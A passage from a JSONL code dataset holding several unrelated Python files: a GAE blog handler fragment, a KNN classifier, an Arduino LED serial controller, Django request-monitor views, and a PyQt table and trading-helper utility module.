db.Key.from_path('Blog', int(post_id))\n blog = db.get(key)\n\n if not blog:\n self.error(404)\n return\n \n self.render('new_entry-display.html', blog = blog)\n return\n \n \napp = webapp2.WSGIApplication([('/', MainPage),\n ('/newpost', NewPost),\n ('/newentry/([0-9]+)', NewEntry)],\n debug=True)\n","sub_path":"unit3_blog/unit3_blog.py","file_name":"unit3_blog.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"268541957","text":"from __future__ import print_function, division\n\nimport time\nimport numpy as np\nimport pandas as pd\n\nfrom collections import Counter\n\nclass KNN(object):\n def __init__(self, n_neighbors=3):\n self.K = n_neighbors\n return\n\n def fit(self, train_X, train_y):\n if isinstance(train_X, pd.DataFrame) or isinstance(train_X, pd.Series):\n train_X = train_X.values\n if isinstance(train_y, pd.DataFrame) or isinstance(train_y, pd.Series):\n train_y = train_y.values\n\n assert len(train_X)==len(train_y), 'train_X must has the same length as train_y'\n self.train_X = train_X\n self.train_y = train_y\n return\n \n def get_result(self, x_vector):\n X_diff = self.train_X - x_vector\n X_diff **= 2\n distance_vector = X_diff.sum(axis=1)\n sorted_idx = np.argsort(np.sqrt(distance_vector))\n y_labels = train_y[sorted_idx]\n y_labels = Counter(y_labels[:self.K])\n y = max(y_labels.keys(), key=lambda x:y_labels[x])\n return y\n \n def predict(self, test_X):\n if isinstance(test_X, pd.DataFrame):\n test_X = test_X.values\n \n if test_X.ndim==1:\n test_X.resize((1, len(test_X)))\n \n assert test_X.shape[1]==self.train_X.shape[1], 'test_X must has the same width as train_X'\n \n y_list = []\n for i in range(test_X.shape[0]):\n x_vector = test_X[i, :]\n y = self.get_result(x_vector)\n y_list.append(y)\n \n return np.array(y_list)\n \n# test\nif __name__=='__main__':\n from sklearn.model_selection import train_test_split\n from sklearn.datasets import fetch_mldata\n from sklearn.neighbors import KNeighborsClassifier\n from sklearn.metrics import accuracy_score\n\n#-------------------------------------------------------------\n\n# train_X = np.array([[1, 1, 1],\n# [2, 2, 2],\n# [3, 3, 3],\n# [4, 4, 4],\n# [5, 5, 5]])\n# train_y = np.array([0, 1, 1, 1, 1])\n# test_X = np.array([0, 0, 0])\n \n#-------------------------------------------------------------\n \n data_path = ('C:/D_Disk/machine_learning_in_action/'\n 'machinelearninginaction-master/Ch02/digits/')\n train_X = np.loadtxt(data_path + 'train_X.txt')\n train_y = np.loadtxt(data_path + 'train_y.txt')\n test_X = np.loadtxt(data_path + 'test_X.txt')\n test_y = np.loadtxt(data_path + 'test_y.txt')\n print('train_X is', train_X.shape)\n print('train_y is', train_y.shape)\n print('test_X is', test_X.shape)\n print('test_y is', test_y.shape)\n \n#------------------------------------------------------------------\n \n# SEED = 911\n# train_df = pd.read_csv('C:/D_Disk/tsg_prog/Digit_Recognizer/mnist_train.csv')\n# train_df = train_df.sample(20000)\n# print('train_df.shape is ', train_df.shape)\n# train_y = train_df['label'].values\n# train_X = train_df.drop(['label'], axis=1).values\n# train_X, test_X, train_y, test_y = train_test_split(train_X,\n# train_y, test_size=0.025, random_state=SEED)\n# \n# print('after train_test_split, train_X.shape: ', train_X.shape,\n# 'train_y.shape: ', train_y.shape)\n\n#------------------------------------------------------------------\n \n start_t = time.time()\n knn = KNN(n_neighbors=3)\n knn.fit(train_X, train_y)\n y_pred = knn.predict(test_X)\n print('accuacy is ', accuracy_score(test_y, y_pred),\n 'cost time: ', time.time()-start_t)\n\n start_t = time.time()\n neigh = KNeighborsClassifier(n_neighbors=3)\n neigh.fit(train_X, train_y) \n y_pred_sklearn = neigh.predict(test_X)\n print('accuacy is ', accuracy_score(test_y, y_pred_sklearn),\n 'cost time: ', time.time()-start_t)\n \n \n \n","sub_path":"k_nearest_neighbors.py","file_name":"k_nearest_neighbors.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"602049937","text":"import serial\nimport tkinter as tk\nser = serial.Serial('COM7', 9600, timeout=1)\nLED_ON = '1'\nLED_OFF = '0'\n\n\nclass ButtonsApp(tk.Tk):\n def __init__(self):\n super().__init__()\n self.btn_on = tk.Button(\n self, text=\"打开\", relief=tk.RAISED, command=self.on)\n self.btn_off = tk.Button(\n self, text=\"关闭\", relief=tk.RAISED, command=self.off)\n self.btn_on.pack(padx=40, pady=10, side=tk.LEFT)\n self.btn_off.pack(padx=40, pady=10, side=tk.LEFT)\n\n def on(self):\n ser.write(LED_ON.encode('utf-8')) # 串口发送数据,编码成比特字符串\n print(\"LED 打开了!\")\n\n def off(self):\n ser.write(LED_OFF.encode('utf-8')) # 串口发送数据,编码成比特字符串\n print(\"LED 关闭了!\")\n\n\nif __name__ == \"__main__\":\n app = ButtonsApp()\n app.title(\"按钮控制arduino LED灯\")\n app.mainloop()\n\n# 蓝牙串口通信\n","sub_path":"pyserial/Python+Arduino 图形化开发/lesson25.py","file_name":"lesson25.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"274628357","text":"from django.http import HttpResponse, HttpResponseBadRequest\nfrom django.views.decorators.http import require_GET\nfrom django.shortcuts import render\nfrom .models import Requests\nimport logging\nimport json\nimport operator\nimport re\nimport time\n\n\nlogger = logging.getLogger(__name__)\n\nREQ_ORDERING = {\n 0: 'chronological',\n 1: 'reverse',\n}\n\nREQ_PRIORITY = {\n 0: 'all requests',\n 1: '1 or greater',\n}\n\n\ndef render_to_json_response(context, **response_kwargs):\n data = json.dumps(context)\n response_kwargs['content_type'] = 'application/json'\n return HttpResponse(data, **response_kwargs)\n\n\n@require_GET\ndef index(request):\n priority = request.GET.get('priority', '0')\n priority = int(priority) if re.match('^\\d+$', priority) else None\n reverse = request.GET.get('reverse', '1')\n reverse = int(reverse) if re.match('^\\d+$', reverse) else None\n\n if priority not in REQ_PRIORITY or reverse not in REQ_ORDERING:\n logger.debug('index GET: %s (pri: %s, rev: %s)' % (request.GET,\n priority,\n reverse))\n return HttpResponseBadRequest()\n\n requests = Requests.objects.order_by('-id') \\\n .filter(priority__gte=priority)[:10]\n latest = requests[0].id if requests else 0\n requests = sorted(requests,\n key=operator.attrgetter('id'),\n reverse=bool(reverse))\n context = {'requests': requests, 'latest': latest,\n 'priority': priority, 'reverse': reverse,\n 'priorities': REQ_PRIORITY, 'ordering': REQ_ORDERING}\n\n return render(request, 'reqmon/index.html', context)\n\n\n@require_GET\ndef updates(request):\n last = request.GET.get('last', '0')\n last = int(last) if re.match('^\\d+$', last) else None\n priority = request.GET.get('priority', '0')\n priority = int(priority) if re.match('^\\d+$', priority) else None\n\n if request.is_ajax() and last is not None and priority in REQ_PRIORITY:\n qs = Requests.objects.order_by('id')\n filter_kwargs = {'pk__gt': last,\n 'priority__gte': priority}\n while True:\n requests = qs.filter(**filter_kwargs)\n if requests:\n break\n else:\n time.sleep(.5)\n\n latest = requests[len(requests)-1].id if requests else last\n result = [{'timestamp': str(r.timestamp),\n 'method': r.method, 'path': r.path}\n for r in requests]\n data = {'result': 'OK', 'latest': latest, 'requests': result}\n return render_to_json_response(data)\n\n else:\n logger.debug('updates GET: %s' % request.GET)\n data = {'result': 'ERROR'}\n return render_to_json_response(data, status=400)\n","sub_path":"apps/reqmon/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"168603444","text":"# -*- coding: utf-8 -*-\n# @Time : 18-12-5 下午3:22\n# @Author : 张帆\n# @Site : \n# @File : tool.py\n# @Software: PyCharm\nimport csv\nimport hashlib\nimport json\nimport socket\nimport subprocess\nimport time\n\nfrom PyQt5.QtCore import QFile, QTextStream, Qt, QVariant, QItemSelection, QItemSelectionModel, QThread, QWaitCondition, \\\n QMutex\nfrom PyQt5.QtGui import QStandardItem, QFont\nfrom PyQt5.QtWidgets import QTableView, QMessageBox\nfrom configobj import ConfigObj\n\nfrom profile import profile\n\n\ndef str_to_time_stamp(date_str, format_str='%Y/%m/%d'):\n '''2018/12/12 ---> 转化为时间戳'''\n if date_str:\n time_now = time.mktime(time.strptime(date_str, format_str))\n return time_now\n else:\n return 0\n\n\ndef time_stamp_to_str(time_stamp, format_str='%Y/%m/%d'):\n '''时间戳转化结构化的时间字符串 ---> 2018/12/12'''\n if time_stamp:\n time_now = time.strftime(format_str, time.localtime(time_stamp))\n return time_now\n else:\n return \"0\"\n\n\ndef find_column_by_name(table_model, header_name):\n '''根据列名,找到他所在的列'''\n column_nums = table_model.columnCount()\n for column in range(column_nums):\n name = table_model.headerData(column, Qt.Horizontal)\n if name == header_name:\n return column\n return 0\n\n\ndef search_aim_row_data(table_model, row):\n '''找到指定行的所有数据'''\n column_nums = table_model.columnCount()\n row_data = []\n for column in range(column_nums):\n model_index = table_model.index(row, column)\n data = table_model.data(model_index)\n row_data.append(data)\n return row_data\n\n\ndef search_aim_item_row_data(table_model, item, column):\n '''找到指定列item所在行所有的的数据'''\n\n result = []\n for row in range(table_model.rowCount()):\n model_index = table_model.index(row, column)\n data = table_model.data(model_index)\n if data == item:\n for column in range(table_model.columnCount()):\n model_index = table_model.index(row, column)\n data = table_model.data(model_index)\n result.append(data)\n return result, row\n else:\n # print(\"没找到联合单号\")\n return None, None\n\n\ndef getMsTime():\n return int(time.time() * 1000)\n\n\ndef traversal_dict(adict):\n # 返回一个字典的循环迭代器\n i = len(adict) - 1\n while True:\n length = len(adict)\n i = i % length\n yield adict[\"group\" + str(i)]\n i -= 1\n\n\ndef add_row_data_to_table_model(table_model, row_data, aim_column, row):\n '''向table_model中添加一行数据,优先替换,如果在row行,aim_column列中,出现过row_data[aim_column],则替换这条数据,否则添加'''\n if row_data[aim_column] == table_model.data(table_model.index(row, aim_column)):\n update_table_one_row(table_model, row_data, row)\n else:\n # print(\"/11231231231\", row_data[aim_column])\n aim_row = search_aim_item_row(table_model, row_data[aim_column], aim_column)\n if aim_row == -1:\n table_model.appendRow(transfer_table_data(row_data))\n else:\n update_table_one_row(table_model, row_data, aim_row)\n\n\ndef add_row_data_to_table_model_search(table_model, row_data, aim_column):\n aim_row = search_aim_item_row(table_model, row_data[aim_column], aim_column)\n if aim_row == -1:\n table_model.appendRow(transfer_table_data(row_data))\n else:\n update_table_one_row_by_delete(table_model, row_data, aim_row)\n\n\ndef update_table_one_row_by_delete(table_model, data, row):\n '''更新表格中row行数据,通过删除的方法'''\n table_model.removeRow(row)\n table_model.insertRow(row, transfer_table_data(data))\n\n\ndef add_row_data_to_table_model_jiacu(table_mode, row_data, aim_column, row, if_jiacu, font):\n '''向table_model中添加一行数据,优先替换,如果在row行,aim_column列中,出现过row_data[aim_column],则替换这条数据,否则添加'''\n if row_data[aim_column] == table_mode.data(table_mode.index(row, aim_column)):\n update_table_one_row(table_mode, row_data, row)\n if if_jiacu:\n table_mode.item(row, 5).setFont(QFont(font.family(), font.pointSize(), QFont.Bold))\n else:\n table_mode.item(row, 5).setFont(QFont(font.family(), font.pointSize(), QFont.Normal))\n else:\n # print(\"/11231231231\", row_data[aim_column])\n aim_row = search_aim_item_row(table_mode, row_data[aim_column], aim_column)\n if aim_row == -1:\n table_mode.appendRow(transfer_table_data(row_data))\n if if_jiacu:\n table_mode.item(table_mode.rowCount() - 1, 5).setFont(\n QFont(font.family(), font.pointSize(), QFont.Bold))\n else:\n table_mode.item(table_mode.rowCount() - 1, 5).setFont(\n QFont(font.family(), font.pointSize(), QFont.Normal))\n else:\n update_table_one_row(table_mode, row_data, aim_row)\n if if_jiacu:\n table_mode.item(aim_row, 5).setFont(QFont(font.family(), font.pointSize(), QFont.Bold))\n else:\n table_mode.item(aim_row, 5).setFont(QFont(font.family(), font.pointSize(), QFont.Normal))\n\n\ndef hide_all_row(tableView, model):\n '''隐藏tableview中的所有行'''\n for row in range(model.rowCount()):\n tableView.hideRow(row)\n\n\ndef show_all_row(tableView, model):\n '''显示tableview中的所有行'''\n for row in range(model.rowCount()):\n tableView.showRow(row)\n\n\ndef getstylesheetfromQss(qss_path):\n file = QFile(qss_path)\n file.open(QFile.ReadOnly)\n ts = QTextStream(file)\n\n stylesheet = ts.readAll()\n return stylesheet\n\n\ndef get_password_md5(password_real):\n '''获得登录界面密码的md5加密'''\n return hashlib.md5(password_real.encode('utf-8')).hexdigest()\n\n\ndef selectMulRows(modelIndexList, table_view):\n \"选中表格中的一行\"\n selection_model = table_view.selectionModel()\n table_model = table_view.model()\n if not modelIndexList:\n return\n selection = QItemSelection()\n for index in modelIndexList:\n left = table_model.index(index.row(), 0)\n right = table_model.index(index.row(), table_model.columnCount() - 1)\n sel = QItemSelection(left, right)\n selection.merge(sel, QItemSelectionModel.Select)\n selection_model.select(selection, QItemSelectionModel.Select)\n\n\ndef search_aim_item_row(table_model, item, column):\n '''找到指定列item所在行'''\n\n for row in range(table_model.rowCount()):\n model_index = table_model.index(row, column)\n data = table_model.data(model_index)\n if data == item:\n return row\n return -1\n\n\ndef remove_aim_item_row(table_model, item, column):\n '''删除指定列内容为item的所有行'''\n for row in range(table_model.rowCount()):\n model_index = table_model.index(row, column)\n data = table_model.data(model_index)\n if data == item:\n table_model.removeRow(row)\n\n\ndef update_table_one_row(table_model, data, row):\n '''更新表格中row行的数据'''\n for column in range(table_model.columnCount()):\n table_model.setData(table_model.index(row, column), data[column], Qt.EditRole)\n\n\ndef findSubStr(substr, str, i):\n count = 0\n while i > 0:\n index = str.find(substr)\n if index == -1:\n return -1\n else:\n str = str[index + 1:]\n i -= 1\n count = count + index + 1\n return count - 1\n\n\ndef insert(original, new, pos):\n '''Inserts new inside original at pos.'''\n return original[:pos] + new + original[pos:]\n\n\n# 下面的函数实现tableView的翻页功能,为什么不提供API,造轮子好烦啊\ndef pageCount(tableView: QTableView):\n '''计算QTableView的总页数'''\n if tableView is None:\n return -1\n rowCount = tableView.rowCount()\n rowHeight = tableView.rowHeight(0)\n if rowHeight == 0:\n return 1\n tableViewHeight = tableView.height()\n rowCountPerPage = tableViewHeight // rowHeight - 1 # 每页显示行数\n ret = rowCount // rowCountPerPage\n tem = rowCount % rowCountPerPage\n if tem != 0:\n ret += 1\n\n return ret\n\n\ndef pageTo(tableView: QTableView, pageNO):\n '''翻到指定页'''\n if tableView is None:\n return\n maxPage = pageCount(tableView)\n if pageNO > maxPage:\n return\n rowCount = tableView.model().rowCount()\n rowHeight = tableView.rowHeight(0)\n if rowHeight == 0:\n return\n tableViewHeight = tableView.height()\n rowCountPerPage = tableViewHeight // rowHeight - 1 # 每页显示行数\n canNotViewCount = rowCount - rowCountPerPage # 看不见的行数\n if canNotViewCount == 0:\n return\n\n maxValue = tableView.verticalScrollBar().maximum()\n if maxValue == 0:\n return\n pageValue = (maxValue * rowCountPerPage) // canNotViewCount\n tableView.verticalScrollBar().setSliderPosition(pageValue * (pageNO - 1))\n\n\ndef pageUp(tableView: QTableView, isLoop=False): # 上翻\n\n if tableView is None:\n return\n tableView.clearSelection()\n rowCount = tableView.model().rowCount() # table中的总行数\n rowHeight = tableView.rowHeight(0) # 一行的高度\n if rowHeight == 0:\n return\n tableViewHeight = tableView.height() # 一页高度\n rowCountPerPage = tableViewHeight // rowHeight - 1 # 每页显示行数\n canNotViewCount = rowCount - rowCountPerPage # 看不见的行数\n if canNotViewCount == 0:\n return\n maxValue = tableView.verticalScrollBar().maximum()\n if maxValue == 0:\n return\n pageValue = (maxValue * rowCountPerPage) // canNotViewCount\n nCurScroller = tableView.verticalScrollBar().value()\n if nCurScroller > 0:\n tableView.verticalScrollBar().setSliderPosition(nCurScroller - pageValue)\n tableView.selectRow(nCurScroller)\n\n else:\n if isLoop:\n tableView.verticalScrollBar().setSliderPosition(maxValue)\n tableView.selectRow(rowCount - rowCountPerPage)\n else:\n tableView.selectRow(0)\n\n\ndef pageDown(tableView: QTableView, isLoop=False):\n # 下翻页\n\n if tableView is None:\n return\n tableView.clearSelection()\n rowCount = tableView.model().rowCount()\n rowHeight = tableView.rowHeight(0)\n if rowHeight == 0:\n return\n tableViewHeight = tableView.height()\n rowCountPerPage = tableViewHeight // rowHeight - 1 # 每页显示行数\n canNotViewCount = rowCount - rowCountPerPage # 看不见的行数\n if canNotViewCount == 0:\n return\n maxValue = tableView.verticalScrollBar().maximum()\n if maxValue == 0:\n return\n pageValue = (maxValue * rowCountPerPage) // canNotViewCount\n nCurScroller = tableView.verticalScrollBar().value()\n if nCurScroller < maxValue:\n tableView.verticalScrollBar().setSliderPosition(nCurScroller + pageValue)\n # print(\"n\", nCurScroller + pageValue)\n # print(nCurScroller)\n # print(pageValue)\n if nCurScroller + pageValue >= rowCount:\n tableView.selectRow(rowCount - rowCountPerPage)\n else:\n tableView.selectRow(nCurScroller + pageValue)\n else:\n if isLoop:\n tableView.verticalScrollBar().setSliderPosition(0)\n tableView.selectRow(0)\n else:\n tableView.selectRow(rowCount-1)\n\n\ndef pageHome(tableView: QTableView):\n # 回到最上\n if tableView is None:\n return\n tableView.clearSelection()\n maxValue = tableView.verticalScrollBar().maximum()\n # if maxValue == 0:\n # return\n tableView.verticalScrollBar().setSliderPosition(0)\n tableView.selectRow(0)\n\n\ndef pageEnd(tableView: QTableView):\n # 回到最下\n if tableView is None:\n return\n tableView.clearSelection()\n maxValue = tableView.verticalScrollBar().maximum()\n # if maxValue == 0:\n # return\n tableView.verticalScrollBar().setSliderPosition(maxValue)\n rowCount = tableView.model().rowCount()\n rowHeight = tableView.rowHeight(0)\n if rowHeight == 0:\n return\n tableViewHeight = tableView.height()\n tableView.selectRow(rowCount - 1)\n\n\ndef pageLeft(tableView: QTableView):\n # 最左\n if tableView is None:\n return\n\n maxValue = tableView.horizontalScrollBar().maximum()\n if maxValue == 0:\n return\n\n tableView.horizontalScrollBar().setSliderPosition(0)\n tableView.selectColumn(0)\n\ndef pageRight(tableView: QTableView):\n # 最右\n if tableView is None:\n return\n maxValue = tableView.horizontalScrollBar().maximum()\n if maxValue == 0:\n return\n tableView.horizontalScrollBar().setSliderPosition(maxValue)\n tableView.selectColumn(tableView.model().columnCount()-1)\n\ndef transfer_simple_table_data(table_data):\n result = []\n\n for item in table_data:\n standard_item = QStandardItem()\n if isinstance(item, int) or isinstance(item, float):\n standard_item.setData(QVariant(item), Qt.EditRole)\n result.append(standard_item)\n else:\n standard_item.setText(str(item))\n result.append(standard_item)\n return result\n\ndef import_csv_to_table(self, table_model, file_name):\n \"\"\"将csv的数据导入到表格\"\"\"\n try:\n with open(file_name, \"r\",encoding=\"utf-8\") as file:\n data = file.readlines()\n for i in range(1, len(data)):\n table_model.appendRow(transfer_table_data(strip_n(data[i].split(\",\"))))\n except PermissionError as e:\n QMessageBox.warning(self, \"无法访问\", \"您没有权限访问这个文件,可能原因:[该文件已经被的打开]\")\ndef export_table_to_csv(self, table_model, file_name):\n '''将表格中的数据导出为csv'''\n try:\n with open(file_name, \"w\", encoding='utf8', newline=\"\") as file:\n writer = csv.writer(file)\n header_list = [table_model.headerData(columnNumber, Qt.Horizontal) for columnNumber in\n range(table_model.columnCount())]\n writer.writerow(header_list)\n for rowNumber in range(table_model.rowCount()):\n fields = [table_model.data(table_model.index(rowNumber, columnNumber), Qt.DisplayRole) for\n columnNumber\n in range(table_model.columnCount())]\n writer.writerow(fields)\n except PermissionError as e:\n QMessageBox.warning(self, \"无法访问\", \"您没有权限访问这个文件,可能原因:[该文件已经被的打开]\")\n\n\ndef transfer_table_data(table_data):\n # 转换数据为QTableView可显示的\n result = []\n for item in table_data:\n if isinstance(item, list):\n if not item:\n result.append(\"\")\n elif isinstance(item[0], int) or isinstance(item[0], float):\n if item[0] > 1516512554:\n item = [time_stamp_to_str(x) for x in item]\n item = \",\".join(item)\n result.append(item)\n else:\n # item = [str(x) for x in item]\n item = [str(round(x, 2)) for x in item]\n item = \",\".join(item)\n result.append(item)\n else:\n item = [str(x) for x in item]\n item = \",\".join(item)\n result.append(item)\n elif isinstance(item, float) or isinstance(table_data, int):\n if item > 1516512554:\n\n item = time_stamp_to_str(item,\"%Y/%m/%d %H:%M:%S\")\n result.append(item)\n else:\n # result.append(item)\n result.append(round(item, 2))\n elif item is None:\n result.append(\"\")\n else:\n result.append(item)\n result2 = []\n for x in result:\n item = QStandardItem()\n item.setTextAlignment(Qt.AlignCenter | Qt.AlignRight)\n if isinstance(x, int) or isinstance(x, float):\n item.setData(QVariant(x), Qt.DisplayRole)\n else:\n item.setText(str(x))\n result2.append(item)\n\n return result2\n\n\ndef net_is_used(address):\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n try:\n s.bind(address)\n except OSError as e:\n return True\n else:\n return False\n finally:\n s.close()\n\n\ndef remove_all_table(table_model):\n '''移除table中的所有数据'''\n # print(\"移除\")\n for row in range(table_model.rowCount()):\n table_model.removeRow(0)\n\n\ndef update_all_table(table_model, header, data):\n # 更新table_model中的所有数据\n remove_all_table(table_model)\n for row, item in enumerate(data):\n table_model.insertRow(row, transfer_table_data(item))\n\ndef cut(number):\n if number == \"0E-10\":\n number =\"%.2f\" %float(0)\n else:\n number = \"%.2f\" % float(number)\n return number\ndef cut_number(recv_json):\n try:\n table_data = recv_json[\"table_data\"]\n if len(table_data[\"在途对冲\"]) > 0:\n data_lists = table_data[\"在途对冲\"]\n for data_list in data_lists:\n if data_list[7] != \"\" and data_list[7] is not None:\n data_list[7] = cut(data_list[7])\n if data_list[8] != \"\" and data_list[8] is not None:\n data_list[8] = cut(data_list[8])\n if data_list[9] != \"\" and data_list[9] is not None:\n data_list[9] = cut(data_list[9])\n if data_list[10] != \"\" and data_list[10] is not None:\n data_list[10] = cut(data_list[10])\n if len(data_list[12]) > 0:\n for i in range(len(data_list[12])):\n if data_list[12][i] != \"\" and data_list[12][i] is not None and data_list[12][i] != \"None\":\n data_list[12][i] = cut(data_list[12][i])\n if len(data_list[15]) > 0:\n for i in range(len(data_list[15])):\n if data_list[15][i] != \"\" and data_list[15][i] is not None and data_list[15][i] != \"None\":\n data_list[15][i] = cut(data_list[15][i])\n if data_list[19] != \"\" and data_list[19] is not None:\n data_list[19] = cut(data_list[19])\n if data_list[20] != \"\" and data_list[20] is not None:\n data_list[20] = cut(data_list[20])\n if len(table_data[\"今日开仓\"]) > 0:\n data_lists = table_data[\"今日开仓\"]\n for data_list in data_lists:\n if data_list[7] != \"\" and data_list[7] is not None:\n data_list[7] = cut(data_list[7])\n if data_list[8] != \"\" and data_list[8] is not None:\n data_list[8] = cut(data_list[8])\n if data_list[9] != \"\" and data_list[9] is not None:\n data_list[9] = cut(data_list[9])\n if data_list[10] != \"\" and data_list[10] is not None:\n data_list[10] = cut(data_list[10])\n if len(data_list[12]) > 0:\n for i in range(len(data_list[12])):\n if data_list[12][i] != \"\" and data_list[12][i] is not None and data_list[12][i] != \"None\":\n data_list[12][i] = cut(data_list[12][i])\n if len(data_list[15]) > 0:\n for i in range(len(data_list[15])):\n if data_list[15][i] != \"\" and data_list[15][i] is not None and data_list[15][i] != \"None\":\n data_list[15][i] = cut(data_list[15][i])\n if data_list[19] != \"\" and data_list[19] is not None:\n data_list[19] = cut(data_list[19])\n if data_list[20] != \"\" and data_list[20] is not None:\n data_list[20] = cut(data_list[20])\n if len(table_data[\"今日平仓\"]) > 0:\n data_lists = table_data[\"今日平仓\"]\n for data_list in data_lists:\n if data_list[7] != \"\" and data_list[7] is not None:\n data_list[7] = cut(data_list[7])\n if data_list[8] != \"\" and data_list[8] is not None:\n data_list[8] = cut(data_list[8])\n if data_list[9] != \"\" and data_list[9] is not None:\n data_list[9] = cut(data_list[9])\n if data_list[10] != \"\" and data_list[10] is not None:\n data_list[10] = cut(data_list[10])\n if len(data_list[12]) > 0:\n for i in range(len(data_list[12])):\n if data_list[12][i] != \"\" and data_list[12][i] is not None and data_list[12][i] != \"None\":\n data_list[12][i] = cut(data_list[12][i])\n if len(data_list[15]) > 0:\n for i in range(len(data_list[15])):\n if data_list[15][i] != \"\" and data_list[15][i] is not None and data_list[15][i] != \"None\":\n data_list[15][i] = cut(data_list[15][i])\n if data_list[19] != \"\" and data_list[19] is not None:\n data_list[19] = cut(data_list[19])\n if data_list[20] != \"\" and data_list[20] is not None:\n data_list[20] = cut(data_list[20])\n if len(table_data[\"今日到期\"]) > 0:\n data_lists = table_data[\"今日到期\"]\n for data_list in data_lists:\n if data_list[7] != \"\" and data_list[7] is not None:\n data_list[7] = cut(data_list[7])\n if data_list[8] != \"\" and data_list[8] is not None:\n data_list[8] = cut(data_list[8])\n if data_list[9] != \"\" and data_list[9] is not None:\n data_list[9] = cut(data_list[9])\n if data_list[10] != \"\" and data_list[10] is not None:\n data_list[10] = cut(data_list[10])\n if len(data_list[12]) > 0:\n for i in range(len(data_list[12])):\n if data_list[12][i] != \"\" and data_list[12][i] is not None and data_list[12][i] != \"None\":\n data_list[12][i] = cut(data_list[12][i])\n if len(data_list[15]) > 0:\n for i in range(len(data_list[15])):\n if data_list[15][i] != \"\" and data_list[15][i] is not None and data_list[15][i] != \"None\":\n data_list[15][i] = cut(data_list[15][i])\n if data_list[19] != \"\" and data_list[19] is not None:\n data_list[19] = cut(data_list[19])\n if data_list[20] != \"\" and data_list[20] is not None:\n data_list[20] = cut(data_list[20])\n except Exception as e:\n print(e)\n return recv_json[\"table_data\"]\n\ndef get_time(format=\"%Y-%m-%d %H:%M:%S\"):\n # 获得当前时间\n return time.strftime(format, time.localtime())\n\n\ndef search_system_code(system_code):\n # 在guest.json文件中,找到系统单号是system_code的那条数据\n with open(profile.GUEST_JSON_URL, \"r\") as table_json:\n table = json.load(table_json)\n guest_table_json = table['data']\n for guest_data in guest_table_json:\n if guest_data['system_code'] == system_code:\n return guest_data\n return None\n\n\nconfig = ConfigObj(profile.CONFIG_INI_URL, encoding=profile.ENCODING)\n\n\ndef startCTP(ctp_started):\n try:\n if not ctp_started:\n global process\n process = None\n if config['CTP'][\"CTP_ip\"] == \"127.0.0.1\": # 如果默认本地服务器地址是127………\n process = subprocess.Popen(profile.CTP_SERVER_URL + \" \" + config['CTP']['CTP_port'],creationflags=subprocess.CREATE_NEW_CONSOLE,\n cwd=profile.CTP_FILE_URL) # 打开本地服务器\n elif config['CTP'][\"CTP_ip\"] == \"NA\":\n pass\n else:\n pass\n except Exception as e:\n print(\"CTP服务器启动失败\")\n\n\n# 关闭\ndef closeCTP():\n global process\n if process is None:\n pass\n else:\n end_process = subprocess.Popen(\"taskkill /F /pid \" + str(process.pid) + \" -t\",\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n end_process.communicate()\n\ndef merge_InvestorPosition(data):\n new_data = []\n code_list = []\n for datas in data:\n if new_data == []:\n new_data.append(datas)\n code_list.append(datas[\"InstrumentID\"])\n else:\n if datas[\"InstrumentID\"] not in code_list:\n code_list.append(datas[\"InstrumentID\"])\n new_data.append(datas)\n else:\n for new_datas in new_data:\n if new_datas[\"InstrumentID\"] == datas[\"InstrumentID\"]:\n new_datas[\"TdBuy\"] = new_datas[\"TdBuy\"] + datas[\"TdBuy\"]\n new_datas[\"TdSell\"] = new_datas[\"TdSell\"] + datas[\"TdSell\"]\n new_datas[\"YstdBuy\"] = new_datas[\"YstdBuy\"] + datas[\"YstdBuy\"]\n new_datas[\"YstdSell\"] = new_datas[\"YstdSell\"] + datas[\"YstdSell\"]\n return new_data\nclass autoTrade(QThread):\n def __init__(self, parent, callback):\n super(autoTrade, self).__init__(parent)\n self.callback = callback\n self.mutex = QMutex()\n self.mutex.lock()\n self.condition = QWaitCondition()\n self._stop = False\n self._pause = False\n\n def run(self):\n while not self._stop:\n if self._pause:\n self.condition.wait(self.mutex)\n self.callback()\n\n def stop(self):\n self._stop = False\n\n def pause(self):\n self._pause = True\n\n def resume(self):\n self.condition.wakeOne()\n self._pause = False\n\n def stop(self):\n self._stop = False\n\n\ndef int_time(now):\n timeArray = time.localtime(now)\n otherStyleTime = time.strftime(\"%Y/%m/%d %H:%M:%S\", timeArray)\n return otherStyleTime\n\"\"\"修改requirement.txt依赖版本\"\"\"\ndef replace_version():\n f = open('requirement.txt', \"r\")\n libs = f.readlines()\n new_libs = []\n for lib in libs:\n if \"PyQt5==5.13.0\" in lib:\n print(\"5.13.0--->5.12.2\")\n lib = lib.replace(\"PyQt5==5.13.0\", \"PyQt5==5.12.2\")\n elif \"PyQt5==5.12.2\" in lib:\n print(\"5.12.2--->5.13.0\")\n lib = lib.replace(\"PyQt5==5.12.2\", \"PyQt5==5.13.0\")\n new_libs.append(lib)\n f.close()\n f = open('requirement.txt', \"w\")\n for new_lib in new_libs:\n f.write(new_lib)\ndef strip_n(datas):\n new_datas = []\n for data in datas:\n new_datas.append(data.strip())\n return new_datas\n\ndef get_header(model):\n header = []\n for i in range(model.columnCount()):\n header.append(model.horizontalHeaderItem(i).text())\n return header\n\n\ndef column_resize(table,model,header):\n data1 = []\n data2 = []\n # 先清空特殊数据\n for i in range(model.rowCount()):\n model_index = model.index(i, header.index(\"相关交易日\"))\n data1.append(model.data(model_index))\n model.setData(model_index, \"\",Qt.EditRole)\n for i in range(model.rowCount()):\n model_index = model.index(i, header.index(\"相关期货价\"))\n data2.append(model.data(model_index))\n model.setData(model_index, \"\",Qt.EditRole)\n # 重置\n table.resizeColumnsToContents()\n # 再归还特殊数据\n for i in range(model.rowCount()):\n model_index = model.index(i, header.index(\"相关交易日\"))\n data1.append(model.data(model_index))\n model.setData(model_index, data1[i],Qt.EditRole)\n for i in range(model.rowCount()):\n model_index = model.index(i, header.index(\"相关期货价\"))\n data1.append(model.data(model_index))\n model.setData(model_index, 